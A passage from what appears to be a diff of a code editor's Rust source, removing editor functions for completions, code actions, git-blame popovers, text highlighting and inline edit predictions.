TP::to_point(&range.start, &snapshot); - (start_point..end_point, text) - }) - .sorted_by_key(|(range, _)| range.start); - buffer.edit(edits, None, cx); - }) - } - - this.refresh_inline_completion(true, false, window, cx); - }); - - let show_new_completions_on_confirm = completion - .confirm - .as_ref() - .map_or(false, |confirm| confirm(intent, window, cx)); - if 
show_new_completions_on_confirm { - self.show_completions(&ShowCompletions { trigger: None }, window, cx); - } - - let provider = self.completion_provider.as_ref()?; - drop(completion); - let apply_edits = provider.apply_additional_edits_for_completion( - buffer_handle, - completions_menu.completions.clone(), - candidate_id, - true, - cx, - ); - - let editor_settings = EditorSettings::get_global(cx); - if editor_settings.show_signature_help_after_edits || editor_settings.auto_signature_help { - // After the code completion is finished, users often want to know what signatures are needed. - // so we should automatically call signature_help - self.show_signature_help(&ShowSignatureHelp, window, cx); - } - - Some(cx.foreground_executor().spawn(async move { - apply_edits.await?; - Ok(()) - })) - } - - pub fn toggle_code_actions( - &mut self, - action: &ToggleCodeActions, - window: &mut Window, - cx: &mut Context, - ) { - let quick_launch = action.quick_launch; - let mut context_menu = self.context_menu.borrow_mut(); - if let Some(CodeContextMenu::CodeActions(code_actions)) = context_menu.as_ref() { - if code_actions.deployed_from_indicator == action.deployed_from_indicator { - // Toggle if we're selecting the same one - *context_menu = None; - cx.notify(); - return; - } else { - // Otherwise, clear it and start a new one - *context_menu = None; - cx.notify(); - } - } - drop(context_menu); - let snapshot = self.snapshot(window, cx); - let deployed_from_indicator = action.deployed_from_indicator; - let mut task = self.code_actions_task.take(); - let action = action.clone(); - cx.spawn_in(window, async move |editor, cx| { - while let Some(prev_task) = task { - prev_task.await.log_err(); - task = editor.update(cx, |this, _| this.code_actions_task.take())?; - } - - let spawned_test_task = editor.update_in(cx, |editor, window, cx| { - if editor.focus_handle.is_focused(window) { - let multibuffer_point = action - .deployed_from_indicator - .map(|row| DisplayPoint::new(row, 
0).to_point(&snapshot)) - .unwrap_or_else(|| editor.selections.newest::(cx).head()); - let (buffer, buffer_row) = snapshot - .buffer_snapshot - .buffer_line_for_row(MultiBufferRow(multibuffer_point.row)) - .and_then(|(buffer_snapshot, range)| { - editor - .buffer - .read(cx) - .buffer(buffer_snapshot.remote_id()) - .map(|buffer| (buffer, range.start.row)) - })?; - let (_, code_actions) = editor - .available_code_actions - .clone() - .and_then(|(location, code_actions)| { - let snapshot = location.buffer.read(cx).snapshot(); - let point_range = location.range.to_point(&snapshot); - let point_range = point_range.start.row..=point_range.end.row; - if point_range.contains(&buffer_row) { - Some((location, code_actions)) - } else { - None - } - }) - .unzip(); - let buffer_id = buffer.read(cx).remote_id(); - let tasks = editor - .tasks - .get(&(buffer_id, buffer_row)) - .map(|t| Arc::new(t.to_owned())); - if tasks.is_none() && code_actions.is_none() { - return None; - } - - editor.completion_tasks.clear(); - editor.discard_inline_completion(false, cx); - let task_context = - tasks - .as_ref() - .zip(editor.project.clone()) - .map(|(tasks, project)| { - Self::build_tasks_context(&project, &buffer, buffer_row, tasks, cx) - }); - - Some(cx.spawn_in(window, async move |editor, cx| { - let task_context = match task_context { - Some(task_context) => task_context.await, - None => None, - }; - let resolved_tasks = - tasks - .zip(task_context.clone()) - .map(|(tasks, task_context)| ResolvedTasks { - templates: tasks.resolve(&task_context).collect(), - position: snapshot.buffer_snapshot.anchor_before(Point::new( - multibuffer_point.row, - tasks.column, - )), - }); - let spawn_straight_away = quick_launch - && resolved_tasks - .as_ref() - .map_or(false, |tasks| tasks.templates.len() == 1) - && code_actions - .as_ref() - .map_or(true, |actions| actions.is_empty()); - let debug_scenarios = editor.update(cx, |editor, cx| { - if cx.has_flag::() { - maybe!({ - let project = 
editor.project.as_ref()?; - let dap_store = project.read(cx).dap_store(); - let mut scenarios = vec![]; - let resolved_tasks = resolved_tasks.as_ref()?; - let debug_adapter: SharedString = buffer - .read(cx) - .language()? - .context_provider()? - .debug_adapter()? - .into(); - dap_store.update(cx, |this, cx| { - for (_, task) in &resolved_tasks.templates { - if let Some(scenario) = this - .debug_scenario_for_build_task( - task.resolved.clone(), - SharedString::from( - task.original_task().label.clone(), - ), - debug_adapter.clone(), - cx, - ) - { - scenarios.push(scenario); - } - } - }); - Some(scenarios) - }) - .unwrap_or_default() - } else { - vec![] - } - })?; - if let Ok(task) = editor.update_in(cx, |editor, window, cx| { - *editor.context_menu.borrow_mut() = - Some(CodeContextMenu::CodeActions(CodeActionsMenu { - buffer, - actions: CodeActionContents::new( - resolved_tasks, - code_actions, - debug_scenarios, - task_context.unwrap_or_default(), - ), - selected_item: Default::default(), - scroll_handle: UniformListScrollHandle::default(), - deployed_from_indicator, - })); - if spawn_straight_away { - if let Some(task) = editor.confirm_code_action( - &ConfirmCodeAction { item_ix: Some(0) }, - window, - cx, - ) { - cx.notify(); - return task; - } - } - cx.notify(); - Task::ready(Ok(())) - }) { - task.await - } else { - Ok(()) - } - })) - } else { - Some(Task::ready(Ok(()))) - } - })?; - if let Some(task) = spawned_test_task { - task.await?; - } - - anyhow::Ok(()) - }) - .detach_and_log_err(cx); - } - - pub fn confirm_code_action( - &mut self, - action: &ConfirmCodeAction, - window: &mut Window, - cx: &mut Context, - ) -> Option>> { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let actions_menu = - if let CodeContextMenu::CodeActions(menu) = self.hide_context_menu(window, cx)? 
{ - menu - } else { - return None; - }; - - let action_ix = action.item_ix.unwrap_or(actions_menu.selected_item); - let action = actions_menu.actions.get(action_ix)?; - let title = action.label(); - let buffer = actions_menu.buffer; - let workspace = self.workspace()?; - - match action { - CodeActionsItem::Task(task_source_kind, resolved_task) => { - workspace.update(cx, |workspace, cx| { - workspace.schedule_resolved_task( - task_source_kind, - resolved_task, - false, - window, - cx, - ); - - Some(Task::ready(Ok(()))) - }) - } - CodeActionsItem::CodeAction { - excerpt_id, - action, - provider, - } => { - let apply_code_action = - provider.apply_code_action(buffer, action, excerpt_id, true, window, cx); - let workspace = workspace.downgrade(); - Some(cx.spawn_in(window, async move |editor, cx| { - let project_transaction = apply_code_action.await?; - Self::open_project_transaction( - &editor, - workspace, - project_transaction, - title, - cx, - ) - .await - })) - } - CodeActionsItem::DebugScenario(scenario) => { - let context = actions_menu.actions.context.clone(); - - workspace.update(cx, |workspace, cx| { - workspace.start_debug_session(scenario, context, Some(buffer), window, cx); - }); - Some(Task::ready(Ok(()))) - } - } - } - - pub async fn open_project_transaction( - this: &WeakEntity, - workspace: WeakEntity, - transaction: ProjectTransaction, - title: String, - cx: &mut AsyncWindowContext, - ) -> Result<()> { - let mut entries = transaction.0.into_iter().collect::>(); - cx.update(|_, cx| { - entries.sort_unstable_by_key(|(buffer, _)| { - buffer.read(cx).file().map(|f| f.path().clone()) - }); - })?; - - // If the project transaction's edits are all contained within this editor, then - // avoid opening a new editor to display them. 
- - if let Some((buffer, transaction)) = entries.first() { - if entries.len() == 1 { - let excerpt = this.update(cx, |editor, cx| { - editor - .buffer() - .read(cx) - .excerpt_containing(editor.selections.newest_anchor().head(), cx) - })?; - if let Some((_, excerpted_buffer, excerpt_range)) = excerpt { - if excerpted_buffer == *buffer { - let all_edits_within_excerpt = buffer.read_with(cx, |buffer, _| { - let excerpt_range = excerpt_range.to_offset(buffer); - buffer - .edited_ranges_for_transaction::(transaction) - .all(|range| { - excerpt_range.start <= range.start - && excerpt_range.end >= range.end - }) - })?; - - if all_edits_within_excerpt { - return Ok(()); - } - } - } - } - } else { - return Ok(()); - } - - let mut ranges_to_highlight = Vec::new(); - let excerpt_buffer = cx.new(|cx| { - let mut multibuffer = MultiBuffer::new(Capability::ReadWrite).with_title(title); - for (buffer_handle, transaction) in &entries { - let edited_ranges = buffer_handle - .read(cx) - .edited_ranges_for_transaction::(transaction) - .collect::>(); - let (ranges, _) = multibuffer.set_excerpts_for_path( - PathKey::for_buffer(buffer_handle, cx), - buffer_handle.clone(), - edited_ranges, - DEFAULT_MULTIBUFFER_CONTEXT, - cx, - ); - - ranges_to_highlight.extend(ranges); - } - multibuffer.push_transaction(entries.iter().map(|(b, t)| (b, t)), cx); - multibuffer - })?; - - workspace.update_in(cx, |workspace, window, cx| { - let project = workspace.project().clone(); - let editor = - cx.new(|cx| Editor::for_multibuffer(excerpt_buffer, Some(project), window, cx)); - workspace.add_item_to_active_pane(Box::new(editor.clone()), None, true, window, cx); - editor.update(cx, |editor, cx| { - editor.highlight_background::( - &ranges_to_highlight, - |theme| theme.editor_highlighted_line_background, - cx, - ); - }); - })?; - - Ok(()) - } - - pub fn clear_code_action_providers(&mut self) { - self.code_action_providers.clear(); - self.available_code_actions.take(); - } - - pub fn 
add_code_action_provider( - &mut self, - provider: Rc, - window: &mut Window, - cx: &mut Context, - ) { - if self - .code_action_providers - .iter() - .any(|existing_provider| existing_provider.id() == provider.id()) - { - return; - } - - self.code_action_providers.push(provider); - self.refresh_code_actions(window, cx); - } - - pub fn remove_code_action_provider( - &mut self, - id: Arc, - window: &mut Window, - cx: &mut Context, - ) { - self.code_action_providers - .retain(|provider| provider.id() != id); - self.refresh_code_actions(window, cx); - } - - fn refresh_code_actions(&mut self, window: &mut Window, cx: &mut Context) -> Option<()> { - let newest_selection = self.selections.newest_anchor().clone(); - let newest_selection_adjusted = self.selections.newest_adjusted(cx).clone(); - let buffer = self.buffer.read(cx); - if newest_selection.head().diff_base_anchor.is_some() { - return None; - } - let (start_buffer, start) = - buffer.text_anchor_for_position(newest_selection_adjusted.start, cx)?; - let (end_buffer, end) = - buffer.text_anchor_for_position(newest_selection_adjusted.end, cx)?; - if start_buffer != end_buffer { - return None; - } - - self.code_actions_task = Some(cx.spawn_in(window, async move |this, cx| { - cx.background_executor() - .timer(CODE_ACTIONS_DEBOUNCE_TIMEOUT) - .await; - - let (providers, tasks) = this.update_in(cx, |this, window, cx| { - let providers = this.code_action_providers.clone(); - let tasks = this - .code_action_providers - .iter() - .map(|provider| provider.code_actions(&start_buffer, start..end, window, cx)) - .collect::>(); - (providers, tasks) - })?; - - let mut actions = Vec::new(); - for (provider, provider_actions) in - providers.into_iter().zip(future::join_all(tasks).await) - { - if let Some(provider_actions) = provider_actions.log_err() { - actions.extend(provider_actions.into_iter().map(|action| { - AvailableCodeAction { - excerpt_id: newest_selection.start.excerpt_id, - action, - provider: provider.clone(), - } - 
})); - } - } - - this.update(cx, |this, cx| { - this.available_code_actions = if actions.is_empty() { - None - } else { - Some(( - Location { - buffer: start_buffer, - range: start..end, - }, - actions.into(), - )) - }; - cx.notify(); - }) - })); - None - } - - fn start_inline_blame_timer(&mut self, window: &mut Window, cx: &mut Context) { - if let Some(delay) = ProjectSettings::get_global(cx).git.inline_blame_delay() { - self.show_git_blame_inline = false; - - self.show_git_blame_inline_delay_task = - Some(cx.spawn_in(window, async move |this, cx| { - cx.background_executor().timer(delay).await; - - this.update(cx, |this, cx| { - this.show_git_blame_inline = true; - cx.notify(); - }) - .log_err(); - })); - } - } - - fn show_blame_popover( - &mut self, - blame_entry: &BlameEntry, - position: gpui::Point, - cx: &mut Context, - ) { - if let Some(state) = &mut self.inline_blame_popover { - state.hide_task.take(); - cx.notify(); - } else { - let delay = EditorSettings::get_global(cx).hover_popover_delay; - let show_task = cx.spawn(async move |editor, cx| { - cx.background_executor() - .timer(std::time::Duration::from_millis(delay)) - .await; - editor - .update(cx, |editor, cx| { - if let Some(state) = &mut editor.inline_blame_popover { - state.show_task = None; - cx.notify(); - } - }) - .ok(); - }); - let Some(blame) = self.blame.as_ref() else { - return; - }; - let blame = blame.read(cx); - let details = blame.details_for_entry(&blame_entry); - let markdown = cx.new(|cx| { - Markdown::new( - details - .as_ref() - .map(|message| message.message.clone()) - .unwrap_or_default(), - None, - None, - cx, - ) - }); - self.inline_blame_popover = Some(InlineBlamePopover { - position, - show_task: Some(show_task), - hide_task: None, - popover_bounds: None, - popover_state: InlineBlamePopoverState { - scroll_handle: ScrollHandle::new(), - commit_message: details, - markdown, - }, - }); - } - } - - fn hide_blame_popover(&mut self, cx: &mut Context) { - if let Some(state) = &mut 
self.inline_blame_popover { - if state.show_task.is_some() { - self.inline_blame_popover.take(); - cx.notify(); - } else { - let hide_task = cx.spawn(async move |editor, cx| { - cx.background_executor() - .timer(std::time::Duration::from_millis(100)) - .await; - editor - .update(cx, |editor, cx| { - editor.inline_blame_popover.take(); - cx.notify(); - }) - .ok(); - }); - state.hide_task = Some(hide_task); - } - } - } - - fn refresh_document_highlights(&mut self, cx: &mut Context) -> Option<()> { - if self.pending_rename.is_some() { - return None; - } - - let provider = self.semantics_provider.clone()?; - let buffer = self.buffer.read(cx); - let newest_selection = self.selections.newest_anchor().clone(); - let cursor_position = newest_selection.head(); - let (cursor_buffer, cursor_buffer_position) = - buffer.text_anchor_for_position(cursor_position, cx)?; - let (tail_buffer, _) = buffer.text_anchor_for_position(newest_selection.tail(), cx)?; - if cursor_buffer != tail_buffer { - return None; - } - let debounce = EditorSettings::get_global(cx).lsp_highlight_debounce; - self.document_highlights_task = Some(cx.spawn(async move |this, cx| { - cx.background_executor() - .timer(Duration::from_millis(debounce)) - .await; - - let highlights = if let Some(highlights) = cx - .update(|cx| { - provider.document_highlights(&cursor_buffer, cursor_buffer_position, cx) - }) - .ok() - .flatten() - { - highlights.await.log_err() - } else { - None - }; - - if let Some(highlights) = highlights { - this.update(cx, |this, cx| { - if this.pending_rename.is_some() { - return; - } - - let buffer_id = cursor_position.buffer_id; - let buffer = this.buffer.read(cx); - if !buffer - .text_anchor_for_position(cursor_position, cx) - .map_or(false, |(buffer, _)| buffer == cursor_buffer) - { - return; - } - - let cursor_buffer_snapshot = cursor_buffer.read(cx); - let mut write_ranges = Vec::new(); - let mut read_ranges = Vec::new(); - for highlight in highlights { - for (excerpt_id, excerpt_range) 
in - buffer.excerpts_for_buffer(cursor_buffer.read(cx).remote_id(), cx) - { - let start = highlight - .range - .start - .max(&excerpt_range.context.start, cursor_buffer_snapshot); - let end = highlight - .range - .end - .min(&excerpt_range.context.end, cursor_buffer_snapshot); - if start.cmp(&end, cursor_buffer_snapshot).is_ge() { - continue; - } - - let range = Anchor { - buffer_id, - excerpt_id, - text_anchor: start, - diff_base_anchor: None, - }..Anchor { - buffer_id, - excerpt_id, - text_anchor: end, - diff_base_anchor: None, - }; - if highlight.kind == lsp::DocumentHighlightKind::WRITE { - write_ranges.push(range); - } else { - read_ranges.push(range); - } - } - } - - this.highlight_background::( - &read_ranges, - |theme| theme.editor_document_highlight_read_background, - cx, - ); - this.highlight_background::( - &write_ranges, - |theme| theme.editor_document_highlight_write_background, - cx, - ); - cx.notify(); - }) - .log_err(); - } - })); - None - } - - fn prepare_highlight_query_from_selection( - &mut self, - cx: &mut Context, - ) -> Option<(String, Range)> { - if matches!(self.mode, EditorMode::SingleLine { .. 
}) { - return None; - } - if !EditorSettings::get_global(cx).selection_highlight { - return None; - } - if self.selections.count() != 1 || self.selections.line_mode { - return None; - } - let selection = self.selections.newest::(cx); - if selection.is_empty() || selection.start.row != selection.end.row { - return None; - } - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - let selection_anchor_range = selection.range().to_anchors(&multi_buffer_snapshot); - let query = multi_buffer_snapshot - .text_for_range(selection_anchor_range.clone()) - .collect::(); - if query.trim().is_empty() { - return None; - } - Some((query, selection_anchor_range)) - } - - fn update_selection_occurrence_highlights( - &mut self, - query_text: String, - query_range: Range, - multi_buffer_range_to_query: Range, - use_debounce: bool, - window: &mut Window, - cx: &mut Context, - ) -> Task<()> { - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - cx.spawn_in(window, async move |editor, cx| { - if use_debounce { - cx.background_executor() - .timer(SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT) - .await; - } - let match_task = cx.background_spawn(async move { - let buffer_ranges = multi_buffer_snapshot - .range_to_buffer_ranges(multi_buffer_range_to_query) - .into_iter() - .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()); - let mut match_ranges = Vec::new(); - for (buffer_snapshot, search_range, excerpt_id) in buffer_ranges { - match_ranges.extend( - project::search::SearchQuery::text( - query_text.clone(), - false, - false, - false, - Default::default(), - Default::default(), - false, - None, - ) - .unwrap() - .search(&buffer_snapshot, Some(search_range.clone())) - .await - .into_iter() - .filter_map(|match_range| { - let match_start = buffer_snapshot - .anchor_after(search_range.start + match_range.start); - let match_end = - buffer_snapshot.anchor_before(search_range.start + match_range.end); - let match_anchor_range = 
Anchor::range_in_buffer( - excerpt_id, - buffer_snapshot.remote_id(), - match_start..match_end, - ); - (match_anchor_range != query_range).then_some(match_anchor_range) - }), - ); - } - match_ranges - }); - let match_ranges = match_task.await; - editor - .update_in(cx, |editor, _, cx| { - editor.clear_background_highlights::(cx); - if !match_ranges.is_empty() { - editor.highlight_background::( - &match_ranges, - |theme| theme.editor_document_highlight_bracket_background, - cx, - ) - } - }) - .log_err(); - }) - } - - fn refresh_selected_text_highlights( - &mut self, - on_buffer_edit: bool, - window: &mut Window, - cx: &mut Context, - ) { - let Some((query_text, query_range)) = self.prepare_highlight_query_from_selection(cx) - else { - self.clear_background_highlights::(cx); - self.quick_selection_highlight_task.take(); - self.debounced_selection_highlight_task.take(); - return; - }; - let multi_buffer_snapshot = self.buffer().read(cx).snapshot(cx); - if on_buffer_edit - || self - .quick_selection_highlight_task - .as_ref() - .map_or(true, |(prev_anchor_range, _)| { - prev_anchor_range != &query_range - }) - { - let multi_buffer_visible_start = self - .scroll_manager - .anchor() - .anchor - .to_point(&multi_buffer_snapshot); - let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( - multi_buffer_visible_start - + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), - Bias::Left, - ); - let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; - self.quick_selection_highlight_task = Some(( - query_range.clone(), - self.update_selection_occurrence_highlights( - query_text.clone(), - query_range.clone(), - multi_buffer_visible_range, - false, - window, - cx, - ), - )); - } - if on_buffer_edit - || self - .debounced_selection_highlight_task - .as_ref() - .map_or(true, |(prev_anchor_range, _)| { - prev_anchor_range != &query_range - }) - { - let multi_buffer_start = multi_buffer_snapshot - .anchor_before(0) - 
                .to_point(&multi_buffer_snapshot);
            // (continuation of `refresh_selected_text_highlights`: schedule the
            // debounced pass that scans the entire multibuffer for other
            // occurrences of the selected text.)
            let multi_buffer_end = multi_buffer_snapshot
                .anchor_after(multi_buffer_snapshot.len())
                .to_point(&multi_buffer_snapshot);
            let multi_buffer_full_range = multi_buffer_start..multi_buffer_end;
            self.debounced_selection_highlight_task = Some((
                query_range.clone(),
                self.update_selection_occurrence_highlights(
                    query_text,
                    query_range,
                    multi_buffer_full_range,
                    true, // use_debounce: the whole-buffer scan is deferred
                    window,
                    cx,
                ),
            ));
        }
    }

    /// Asks the active edit-prediction provider to refresh its prediction for
    /// the newest cursor position.
    ///
    /// Returns `None` (after discarding any currently displayed completion)
    /// when there is no provider, the cursor cannot be resolved to a single
    /// underlying buffer, or predictions are disabled in that buffer; unless
    /// `user_requested`, also bails when predictions should not be shown right
    /// now, the editor is unfocused, or the buffer is empty.
    pub fn refresh_inline_completion(
        &mut self,
        debounce: bool,
        user_requested: bool,
        window: &mut Window,
        cx: &mut Context,
    ) -> Option<()> {
        let provider = self.edit_prediction_provider()?;
        let cursor = self.selections.newest_anchor().head();
        let (buffer, cursor_buffer_position) =
            self.buffer.read(cx).text_anchor_for_position(cursor, cx)?;

        if !self.edit_predictions_enabled_in_buffer(&buffer, cursor_buffer_position, cx) {
            self.discard_inline_completion(false, cx);
            return None;
        }

        // Explicit user requests bypass the focus/visibility checks.
        if !user_requested
            && (!self.should_show_edit_predictions()
                || !self.is_focused(window)
                || buffer.read(cx).is_empty())
        {
            self.discard_inline_completion(false, cx);
            return None;
        }

        self.update_visible_inline_completion(window, cx);
        provider.refresh(
            self.project.clone(),
            buffer,
            cursor_buffer_position,
            debounce,
            cx,
        );
        Some(())
    }

    /// Whether predictions should be rendered inside the completions menu
    /// rather than inline in the buffer.
    fn show_edit_predictions_in_menu(&self) -> bool {
        match self.edit_prediction_settings {
            EditPredictionSettings::Disabled => false,
            EditPredictionSettings::Enabled { show_in_menu, .. } => show_in_menu,
        }
    }

    /// Whether edit predictions are enabled at the current cursor position
    /// (per the most recently computed `edit_prediction_settings`).
    pub fn edit_predictions_enabled(&self) -> bool {
        match self.edit_prediction_settings {
            EditPredictionSettings::Disabled => false,
            EditPredictionSettings::Enabled { .. } => true,
        }
    }

    /// Whether previewing a prediction requires holding a modifier key.
    fn edit_prediction_requires_modifier(&self) -> bool {
        match self.edit_prediction_settings {
            EditPredictionSettings::Disabled => false,
            EditPredictionSettings::Enabled {
                preview_requires_modifier,
                ..
            } => preview_requires_modifier,
        }
    }

    /// Recomputes `edit_prediction_settings` for the newest cursor position,
    /// or disables predictions outright when no provider is registered.
    pub fn update_edit_prediction_settings(&mut self, cx: &mut Context) {
        if self.edit_prediction_provider.is_none() {
            self.edit_prediction_settings = EditPredictionSettings::Disabled;
        } else {
            let selection = self.selections.newest_anchor();
            let cursor = selection.head();

            if let Some((buffer, cursor_buffer_position)) =
                self.buffer.read(cx).text_anchor_for_position(cursor, cx)
            {
                self.edit_prediction_settings =
                    self.edit_prediction_settings_at_position(&buffer, cursor_buffer_position, cx);
            }
        }
    }

    /// Resolves the effective edit-prediction settings at a buffer position,
    /// combining editor mode, the per-editor override, scope-level disabling,
    /// language settings, and the provider's menu preference.
    fn edit_prediction_settings_at_position(
        &self,
        buffer: &Entity,
        buffer_position: language::Anchor,
        cx: &App,
    ) -> EditPredictionSettings {
        // Disabled outright in non-full editors (e.g. single-line inputs),
        // when overridden off for this editor, or when the syntactic scope at
        // this position disables inline completions.
        if !self.mode.is_full()
            || !self.show_inline_completions_override.unwrap_or(true)
            || self.inline_completions_disabled_in_scope(buffer, buffer_position, cx)
        {
            return EditPredictionSettings::Disabled;
        }

        let buffer = buffer.read(cx);

        let file = buffer.file();

        if !language_settings(cx).buffer(buffer).get().show_edit_predictions {
            return EditPredictionSettings::Disabled;
        };

        // The provider may ask for its completions to be surfaced in the
        // completions menu instead of inline.
        let by_provider = matches!(
            self.menu_inline_completions_policy,
            MenuInlineCompletionsPolicy::ByProvider
        );

        let show_in_menu = by_provider
            && self
                .edit_prediction_provider
                .as_ref()
                .map_or(false, |provider| {
                    provider.provider.show_completions_in_menu()
                });

        // "Subtle" mode means the preview only appears while a modifier is held.
        let preview_requires_modifier =
            all_language_settings(file, cx).edit_predictions_mode() == EditPredictionsMode::Subtle;

        EditPredictionSettings::Enabled {
            show_in_menu,
            preview_requires_modifier,
        }
    }

    /// Predictions are suppressed while a snippet is being filled in.
    fn should_show_edit_predictions(&self) -> bool {
        self.snippet_stack.is_empty() && self.edit_predictions_enabled()
    }

    /// Whether the user is currently holding the prediction-preview modifier.
    pub fn edit_prediction_preview_is_active(&self) -> bool {
        matches!(
            self.edit_prediction_preview,
            EditPredictionPreview::Active { ..
} - ) - } - - pub fn edit_predictions_enabled_at_cursor(&self, cx: &App) -> bool { - let cursor = self.selections.newest_anchor().head(); - if let Some((buffer, cursor_position)) = - self.buffer.read(cx).text_anchor_for_position(cursor, cx) - { - self.edit_predictions_enabled_in_buffer(&buffer, cursor_position, cx) - } else { - false - } - } - - fn edit_predictions_enabled_in_buffer( - &self, - buffer: &Entity, - buffer_position: language::Anchor, - cx: &App, - ) -> bool { - maybe!({ - if self.read_only(cx) { - return Some(false); - } - let provider = self.edit_prediction_provider()?; - if !provider.is_enabled(&buffer, buffer_position, cx) { - return Some(false); - } - let buffer = buffer.read(cx); - let Some(file) = buffer.file() else { - return Some(true); - }; - let settings = all_language_settings(Some(file), cx); - Some(settings.edit_predictions_enabled_for_file(file, cx)) - }) - .unwrap_or(false) - } - - fn cycle_inline_completion( - &mut self, - direction: Direction, - window: &mut Window, - cx: &mut Context, - ) -> Option<()> { - let provider = self.edit_prediction_provider()?; - let cursor = self.selections.newest_anchor().head(); - let (buffer, cursor_buffer_position) = - self.buffer.read(cx).text_anchor_for_position(cursor, cx)?; - if self.inline_completions_hidden_for_vim_mode || !self.should_show_edit_predictions() { - return None; - } - - provider.cycle(buffer, cursor_buffer_position, direction, cx); - self.update_visible_inline_completion(window, cx); - - Some(()) - } - - pub fn show_inline_completion( - &mut self, - _: &ShowEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if !self.has_active_inline_completion() { - self.refresh_inline_completion(false, true, window, cx); - return; - } - - self.update_visible_inline_completion(window, cx); - } - - pub fn display_cursor_names( - &mut self, - _: &DisplayCursorNames, - window: &mut Window, - cx: &mut Context, - ) { - self.show_cursor_names(window, cx); - } - - fn show_cursor_names(&mut 
self, window: &mut Window, cx: &mut Context) { - self.show_cursor_names = true; - cx.notify(); - cx.spawn_in(window, async move |this, cx| { - cx.background_executor().timer(CURSORS_VISIBLE_FOR).await; - this.update(cx, |this, cx| { - this.show_cursor_names = false; - cx.notify() - }) - .ok() - }) - .detach(); - } - - pub fn next_edit_prediction( - &mut self, - _: &NextEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.has_active_inline_completion() { - self.cycle_inline_completion(Direction::Next, window, cx); - } else { - let is_copilot_disabled = self - .refresh_inline_completion(false, true, window, cx) - .is_none(); - if is_copilot_disabled { - cx.propagate(); - } - } - } - - pub fn previous_edit_prediction( - &mut self, - _: &PreviousEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.has_active_inline_completion() { - self.cycle_inline_completion(Direction::Prev, window, cx); - } else { - let is_copilot_disabled = self - .refresh_inline_completion(false, true, window, cx) - .is_none(); - if is_copilot_disabled { - cx.propagate(); - } - } - } - - pub fn accept_edit_prediction( - &mut self, - _: &AcceptEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - if self.show_edit_predictions_in_menu() { - self.hide_context_menu(window, cx); - } - - let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { - return; - }; - - self.report_inline_completion_event( - active_inline_completion.completion_id.clone(), - true, - cx, - ); - - match &active_inline_completion.completion { - InlineCompletion::Move { target, .. } => { - let target = *target; - - if let Some(position_map) = &self.last_position_map { - if position_map - .visible_row_range - .contains(&target.to_display_point(&position_map.snapshot).row()) - || !self.edit_prediction_requires_modifier() - { - self.unfold_ranges(&[target..target], true, false, cx); - // Note that this is also done in vim's handler of the Tab action. 
- self.change_selections( - Some(Autoscroll::newest()), - window, - cx, - |selections| { - selections.select_anchor_ranges([target..target]); - }, - ); - self.clear_row_highlights::(); - - self.edit_prediction_preview - .set_previous_scroll_position(None); - } else { - self.edit_prediction_preview - .set_previous_scroll_position(Some( - position_map.snapshot.scroll_anchor, - )); - - self.highlight_rows::( - target..target, - cx.theme().colors().editor_highlighted_line_background, - RowHighlightOptions { - autoscroll: true, - ..Default::default() - }, - cx, - ); - self.request_autoscroll(Autoscroll::fit(), cx); - } - } - } - InlineCompletion::Edit { edits, .. } => { - if let Some(provider) = self.edit_prediction_provider() { - provider.accept(cx); - } - - let snapshot = self.buffer.read(cx).snapshot(cx); - let last_edit_end = edits.last().unwrap().0.end.bias_right(&snapshot); - - self.buffer.update(cx, |buffer, cx| { - buffer.edit(edits.iter().cloned(), None, cx) - }); - - self.change_selections(None, window, cx, |s| { - s.select_anchor_ranges([last_edit_end..last_edit_end]) - }); - - self.update_visible_inline_completion(window, cx); - if self.active_inline_completion.is_none() { - self.refresh_inline_completion(true, true, window, cx); - } - - cx.notify(); - } - } - - self.edit_prediction_requires_modifier_in_indent_conflict = false; - } - - pub fn accept_partial_inline_completion( - &mut self, - _: &AcceptPartialEditPrediction, - window: &mut Window, - cx: &mut Context, - ) { - let Some(active_inline_completion) = self.active_inline_completion.as_ref() else { - return; - }; - if self.selections.count() != 1 { - return; - } - - self.report_inline_completion_event( - active_inline_completion.completion_id.clone(), - true, - cx, - ); - - match &active_inline_completion.completion { - InlineCompletion::Move { target, .. 
} => { - let target = *target; - self.change_selections(Some(Autoscroll::newest()), window, cx, |selections| { - selections.select_anchor_ranges([target..target]); - }); - } - InlineCompletion::Edit { edits, .. } => { - // Find an insertion that starts at the cursor position. - let snapshot = self.buffer.read(cx).snapshot(cx); - let cursor_offset = self.selections.newest::(cx).head(); - let insertion = edits.iter().find_map(|(range, text)| { - let range = range.to_offset(&snapshot); - if range.is_empty() && range.start == cursor_offset { - Some(text) - } else { - None - } - }); - - if let Some(text) = insertion { - let mut partial_completion = text - .chars() - .by_ref() - .take_while(|c| c.is_alphabetic()) - .collect::(); - if partial_completion.is_empty() { - partial_completion = text - .chars() - .by_ref() - .take_while(|c| c.is_whitespace() || !c.is_alphabetic()) - .collect::(); - } - - cx.emit(EditorEvent::InputHandled { - utf16_range_to_replace: None, - text: partial_completion.clone().into(), - }); - - self.insert_with_autoindent_mode(&partial_completion, None, window, cx); - - self.refresh_inline_completion(true, true, window, cx); - cx.notify(); - } else { - self.accept_edit_prediction(&Default::default(), window, cx); - } - } - } - } - - fn discard_inline_completion( - &mut self, - should_report_inline_completion_event: bool, - cx: &mut Context, - ) -> bool { - if should_report_inline_completion_event { - let completion_id = self - .active_inline_completion - .as_ref() - .and_then(|active_completion| active_completion.completion_id.clone()); - - self.report_inline_completion_event(completion_id, false, cx); - } - - if let Some(provider) = self.edit_prediction_provider() { - provider.discard(cx); - } - - self.take_active_inline_completion(cx) - } - - fn report_inline_completion_event(&self, id: Option, accepted: bool, cx: &App) { - let Some(provider) = self.edit_prediction_provider() else { - return; - }; - - let Some((_, buffer, _)) = self - .buffer - 
            .read(cx)
            // (continuation of `report_inline_completion_event`: resolve the
            // excerpt containing the newest cursor so its buffer can be read.)
            .excerpt_containing(self.selections.newest_anchor().head(), cx)
        else {
            return;
        };

        // File extension for the telemetry payload; `None` when the buffer is
